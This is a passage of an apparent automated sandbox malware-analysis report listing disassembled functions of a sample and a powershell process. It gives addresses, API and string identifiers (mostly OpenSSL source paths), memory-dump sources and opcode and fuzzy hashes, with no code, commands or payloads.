                                                              • Instruction Fuzzy Hash: C0416C36E08A53C5EB18DF25E9811BC27A4EB497D8B555035EA6EC7BE5EE3CE481C300
                                                              Function 00007FF6FB1FF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                              • String ID: .$:
                                                              • API String ID: 2020911589-4202072812
                                                              • Opcode ID: d87eb04c00ab0d11921b960990d015d2b833b70a5179bc2debb53fca30d01a9c
                                                              • Instruction ID: 751dcc1dd1b5525232542b870e70bda81a8fe4585af1ea3eb1b8886e7e3f7060
                                                              • Opcode Fuzzy Hash: d87eb04c00ab0d11921b960990d015d2b833b70a5179bc2debb53fca30d01a9c
                                                              • Instruction Fuzzy Hash: EA414A22E0965398FB10DBA198611BC27B4BF1875CF540039EE6DA7AE9EF78A456C300
                                                              Function 00007FF6FB1FBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                              • Instruction ID: 8578bb5448fca6d6b7ca3f789977a7d2209c012eeacf791fba62aa5c6ae5ebc4
                                                              • Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                              • Instruction Fuzzy Hash: 8541B322A18A8681DB20DF25E4447BA6760FB8C798F944131EE5DC7BE8EF3CD441CB40
                                                              Function 00007FFDFB2446F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007E1170E126
                                                              • String ID: ..\s\crypto\x509v3\v3_utl.c$E
                                                              • API String ID: 200926875-2813183830
                                                              • Opcode ID: 0eef34bb189bc0c96894fbceed15470d689ed06ecddb61039ee8e60ce9ea0c21
                                                              • Instruction ID: 74d0a505fb9a0cf0bf144491f1e0d8fb5488b47eaac703f54e6f8e364668a473
                                                              • Opcode Fuzzy Hash: 0eef34bb189bc0c96894fbceed15470d689ed06ecddb61039ee8e60ce9ea0c21
                                                              • Instruction Fuzzy Hash: CF414D61B1B74385EB14EB12A820A796790AF4A7D0F484435EE6D47BEEDF3CE612D700
                                                              Function 00007FFDFB0039B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007E2002
                                                              • String ID: ..\s\crypto\rand\randfile.c$Filename=
                                                              • API String ID: 1750240854-2201148535
                                                              • Opcode ID: ffb6a3000f1f43db175e07ee08783f9f81d8d84b3e7221bb60cce5b0c7cc5f2d
                                                              • Instruction ID: 38d8ab1d0b4f0c38291c65db4003a972ab7bcb8f0b9caa53874e3d85428ea5a0
                                                              • Opcode Fuzzy Hash: ffb6a3000f1f43db175e07ee08783f9f81d8d84b3e7221bb60cce5b0c7cc5f2d
                                                              • Instruction Fuzzy Hash: 6D318162B0E64796EB10EB15E460AFA6391FF85788F844035EA6D47AEDDF3CF5048B01
                                                              Function 00007FFDFB3B3A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              • Associated: 00000001.00000002.1991585735.00007FFDFB380000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F3000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB418000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB42D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992057570.00007FFDFB430000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\ssl\ssl_sess.c$T
                                                              • API String ID: 0-2647723609
                                                              • Opcode ID: a86c482ed1667c2386997e7d485d9949709b2799da1d8a0bf24f4547081771c5
                                                              • Instruction ID: 7fda89159b5d1ba42f90db4267b9f657dc36f20ef18aabfb856e3f9a5fabab36
                                                              • Opcode Fuzzy Hash: a86c482ed1667c2386997e7d485d9949709b2799da1d8a0bf24f4547081771c5
                                                              • Instruction Fuzzy Hash: A5215025B5964382EB50EF61D424BE967D0EB84748F884036DA5D473EAEF3DE508CB01
                                                              Function 00007FF6FB1FE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID: :
                                                              • API String ID: 1611563598-336475711
                                                              • Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                              • Instruction ID: 1f03d44e165032d7eeec944408b60b3d3521c9fa64b7f28c6c1d81e73b34da24
                                                              • Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                              • Instruction Fuzzy Hash: E921B123A0868381EB60DB15D04427E73A1FBCCB88F854035D6AD836E8EF7CE545C751
                                                              Function 00007FFDFB003387 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastgetsockname
                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                              • API String ID: 566540725-540685895
                                                              • Opcode ID: 3f7e4d637075843b50ffdfd6546d49ef448eefcf8eb4d6d42073b27a69ad320d
                                                              • Instruction ID: 4f6f56d2f082c290709c539ff2fc5f1ba576be647c492d9b86ae00a43c6409ad
                                                              • Opcode Fuzzy Hash: 3f7e4d637075843b50ffdfd6546d49ef448eefcf8eb4d6d42073b27a69ad320d
                                                              • Instruction Fuzzy Hash: 1B2160B1B0650786E710DB21E825AEE6760FF82754F840535EAAC436F8DF3DE685DB40
                                                              Function 00007FF6FB1EF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                              • Instruction ID: 0d81c36123044be23eced6fa8f0323cd471005690991adf5f33c967407c1c9f3
                                                              • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                              • Instruction Fuzzy Hash: A0114C36A18B4582EB218B15E54026D77E1FB88B98F184231DE9D47BA4EF3DE551C700
                                                              Function 00007FF6FB1FFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                              • String ID: :
                                                              • API String ID: 2595371189-336475711
                                                              • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                              • Instruction ID: 5efa9ca9b9e8c2a2314436d27ea6877620663d8825c206dae8e1fdef55b359fa
                                                              • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                              • Instruction Fuzzy Hash: 93017822E1864786EB30EB60946127E63A0EF4C74CF841036D56DC26E1FEACE555CA14
                                                              Function 00007FFDFB0015AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: !$..\s\crypto\ct\ct_policy.c
                                                              • API String ID: 3568877910-3401457818
                                                              • Opcode ID: f8ad8f7d64f1f5fb2bc396660ebdd1b69d3ea8b5320bd96bda6debcd379a685e
                                                              • Instruction ID: f3e0d02c48abd1048cc50ddda5d1bc40940383bd9341b0daa364327a176015d6
                                                              • Opcode Fuzzy Hash: f8ad8f7d64f1f5fb2bc396660ebdd1b69d3ea8b5320bd96bda6debcd379a685e
                                                              • Instruction Fuzzy Hash: 51F03761F17607D6EB059B24E426BAD23A0EF40744F440035EA6D423EAEF3CE656DB00
                                                              Function 00007FFDFB006BEA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket
                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                              • API String ID: 1021210092-540685895
                                                              • Opcode ID: 4461a209f28e95a1d17e1fe27fd0101058cda89b9424f7b2e88bf19f5e6d7981
                                                              • Instruction ID: 7ea008e170b918b9173af6f71df9ca62bfb0a130c7a28489551f48c4c33fdfa1
                                                              • Opcode Fuzzy Hash: 4461a209f28e95a1d17e1fe27fd0101058cda89b9424f7b2e88bf19f5e6d7981
                                                              • Instruction Fuzzy Hash: 14E09AA0B0B50387F7116B61A834FBA2350AF06749F000534F92D827F9DF3DE2499A10

                                                              Executed Functions

                                                              Function 00007FFD9AEE67F5 Relevance: .4, Instructions: 440COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1959111539.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9aee0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18d90288ae328449d801380bd3f8df489ff988c43e22091339f0b43337f9d0cc
                                                              • Instruction ID: c9305584098c529e83ec66757cf539134204228de29ef8d7667655e2c463622e
                                                              • Opcode Fuzzy Hash: 18d90288ae328449d801380bd3f8df489ff988c43e22091339f0b43337f9d0cc
                                                              • Instruction Fuzzy Hash: D2D11832B0DACA0FE7A9ABA848755B57B91EF45310B2801FFD45DC70D3DA1AAC05C351
                                                              Function 00007FFD9ACFE620 Relevance: .1, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1956780631.00007FFD9ACFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ACFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9acfd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2707e6fcb4d7b3d15e415a4fa961ac8ff7c133bb9f65a667ea70660477e4aefb
                                                              • Instruction ID: 509aa4bffff4f9fd43f9088f188158fda3ebe7110694d179c890eec5c8fb54c0
                                                              • Opcode Fuzzy Hash: 2707e6fcb4d7b3d15e415a4fa961ac8ff7c133bb9f65a667ea70660477e4aefb
                                                              • Instruction Fuzzy Hash: 4841387190DBC88FE75A9B389C559563FF0EF56324B0901EFD088CF1A3D624A846C7A2
                                                              Function 00007FFD9AE1989D Relevance: .1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd439fedf874c4657736ad0582669b40a686433e1ae49751d4dd1bfd6f42e8e6
